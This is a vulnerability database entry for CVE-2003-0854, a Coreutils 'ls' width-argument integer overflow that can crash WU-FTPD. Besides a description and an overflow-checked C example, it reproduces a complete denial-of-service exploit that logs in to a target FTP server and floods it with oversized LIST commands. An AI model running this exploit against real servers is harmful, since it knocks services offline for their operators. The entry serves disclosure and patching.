Coreutils ls width argument integer overflow vulnerability

Vulnerability ID: 1107562    Vulnerability type: boundary condition error
Published: 2003-10-31    Updated: 2006-09-20
CVE ID: CVE-2003-0854    CNNVD ID: CNNVD-200311-050
Platform: Linux    CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200311-050
|Vulnerability details
Coreutils 'ls' is a utility for displaying file and directory information. When handling the width (-w) and column display (-C) command-line arguments, Coreutils 'ls' lacks proper bounds checking; a local or remote attacker can use this to trigger an integer overflow and crash the application. Passing an overlong argument "-wX -C" (where X is an arbitrarily large value) to Coreutils 'ls' makes it allocate a very large block of memory and causes an integer overflow. A remote application that lets users invoke 'ls' without filtering the arguments can therefore be crashed; the Wu-ftpd FTP server is affected in this way.
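The root cause is unchecked arithmetic on the width value: the column layout needs a table whose size grows quadratically with the number of columns, so a huge -w both demands enormous memory and can wrap the size computation. The following added example (not coreutils code; a simplified model with a hypothetical MIN_COLUMN_WIDTH and a hypothetical memory budget) shows the overflow-checked version of that computation and a width parser that rejects values the budget cannot cover.

```c
#include <errno.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Narrowest column the layout will produce (hypothetical constant for this model). */
#define MIN_COLUMN_WIDTH 3

/* Bytes needed for the per-column width table of a given line length:
 * one row per candidate column count 1..max_idx, row i holding i widths,
 * i.e. max_idx*(max_idx+1)/2 size_t entries. Returns false instead of a
 * wrapped value when any step overflows size_t; the unchecked form of this
 * multiply is what turns a huge -w into a bogus allocation size. */
static bool column_table_bytes(size_t line_length, size_t *bytes)
{
    size_t max_idx = line_length / MIN_COLUMN_WIDTH;
    if (max_idx == 0) max_idx = 1;
    if (max_idx > SIZE_MAX - 1) return false;              /* max_idx + 1 wraps */
    if (max_idx + 1 > SIZE_MAX / max_idx) return false;    /* product wraps */
    size_t entries = max_idx * (max_idx + 1) / 2;
    if (entries > SIZE_MAX / sizeof(size_t)) return false; /* byte count wraps */
    *bytes = entries * sizeof(size_t);
    return true;
}

/* Parse a -w argument and accept it only if the table fits a fixed budget.
 * Rejects non-numeric input, negatives, arithmetic overflow and oversize. */
static bool parse_width_arg(const char *arg, size_t budget_bytes, size_t *bytes)
{
    char *end;
    errno = 0;
    unsigned long long v = strtoull(arg, &end, 10);
    if (arg[0] == '-' || end == arg || *end != '\0' || errno == ERANGE) return false;
    if (v > SIZE_MAX) return false;
    if (!column_table_bytes((size_t)v, bytes)) return false;
    return *bytes <= budget_bytes;
}

int main(void)
{
    /* Constructed sample arguments, including the value used by the exploit below. */
    const char *samples[] = {"80", "1000000", "18446744073709551615", "-5", "12abc"};
    size_t budget = 1u << 20; /* 1 MiB: an arbitrary per-listing budget */
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        size_t bytes = 0;
        bool ok = parse_width_arg(samples[i], budget, &bytes);
        printf("-w %-22s -> %s (%zu bytes)\n", samples[i], ok ? "accept" : "reject", bytes);
    }
    return 0;
}
```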
|Vulnerability EXP
/*
 *     (c) Rosiello Security
 *
 * Copyright Rosiello Security 2003
 *   All Rights reserved.
 *
 * Tested on Red Hat 9.0
 *
 * Author: Angelo Rosiello
 * Mail  : angelo rosiello org
 * This software is only for educational purpose.
 * Do not use it against machines different from yours.
 * Respect law.
 *
 */

#include <stdio.h>
#include <stdlib.h>      /* atoi, exit */
#include <string.h>
#include <unistd.h>      /* write, close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */

void addr_initialize( struct sockaddr_in *address, int port, long IPaddr );
void usage( char *program );

/* Read and echo one line of the server's reply, one byte at a time. */
static void read_line( int sd )
{
	char ch = '\0';
	while ( ch != '\n' )
	{
		if ( recv( sd, &ch, 1, 0 ) <= 0 ) break;  /* connection closed or error */
		printf( "%c", ch );
	}
}

int main( int argc, char **argv )
{
	int i, sd, PORT, loop, error;
	char user[30], password[30];
	struct sockaddr_in server_addr;

	fprintf( stdout, "\n(c) Rosiello Security 2003\n" );
	fprintf( stdout, "http://www.rosiello.org\n" );
	fprintf( stdout, "WU-FTPD 2.6.2 Freezer by Angelo Rosiello\n\n" );

	if( argc != 6 ) usage( argv[0] );

	/* Keep the USER/PASS lines inside their 30-byte buffers. */
	if( strlen( argv[3] ) > 20 ) exit( 0 );
	if( strlen( argv[4] ) > 20 ) exit( 0 );

	sprintf( user, "USER %s\n", argv[3] );
	sprintf( password, "PASS %s\n", argv[4] );

	PORT = atoi( argv[2] );
	loop = atoi( argv[5] );

	addr_initialize( &server_addr, PORT, ( long )inet_addr( argv[1] ));
	sd = socket( AF_INET, SOCK_STREAM, 0 );

	error = connect( sd, ( struct sockaddr * ) &server_addr, sizeof( server_addr ));
	if( error != 0 )
	{
		perror( "Something wrong with the connection" );
		exit( 0 );
	}

	read_line( sd );   /* FTP banner */

	printf( "Connection executed, now waiting to log in...\n" );

	printf( "%s", user );
	send( sd, user, strlen( user ), 0 );
	read_line( sd );

	printf( "%s", password );
	send( sd, password, strlen( password ), 0 );
	read_line( sd );

	printf( "Sending the DoS query\n" );
	for( i=0; i<loop; i++ )
	{
		write( sd, "LIST -w 1000000 -C\n", 19 );
	}
	printf( "All done\n" );
	close( sd );
	return 0;
}

void addr_initialize( struct sockaddr_in *address, int port, long IPaddr )
{
	address -> sin_family = AF_INET;
	address -> sin_port = htons( (u_short)port );
	address -> sin_addr.s_addr = IPaddr;
}

void usage( char *program )
{
	fprintf( stdout, "USAGE: <%s> <IP> <PORT> <USER> <PASS> <LOOP>\n", program );
	exit( 0 );
}


// milw0rm.com [2003-10-31]
|References

Source: TURBO
Name: TLSA-2003-60
Link: http://www.turbolinux.com/security/TLSA-2003-60.txt
Source: IMMUNIX
Name: IMNX-2003-7+-026-01
Link: http://www.securityfocus.com/advisories/6014
Source: REDHAT
Name: RHSA-2003:310
Link: http://www.redhat.com/support/errata/RHSA-2003-310.html
Source: REDHAT
Name: RHSA-2003:309
Link: http://www.redhat.com/support/errata/RHSA-2003-309.html
Source: www.guninski.com
Link: http://www.guninski.com/binls.html
Source: DEBIAN
Name: DSA-705
Link: http://www.debian.org/security/2005/dsa-705
Source: support.avaya.com
Link: http://support.avaya.com/elmodocs2/security/ASA-2005-213.pdf
Source: SECUNIA
Name: 17069
Link: http://secunia.com/advisories/17069
Source: SECUNIA
Name: 10126
Link: http://secunia.com/advisories/10126
Source: FULLDISC
Name: 20031022 Fun with /bin/ls, yet still ls better than windows
Link: http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012548.html
Source: CONECTIVA
Name: CLA-2003:771
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000771
Source: CONECTIVA
Name: CLA-2003:768
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=0007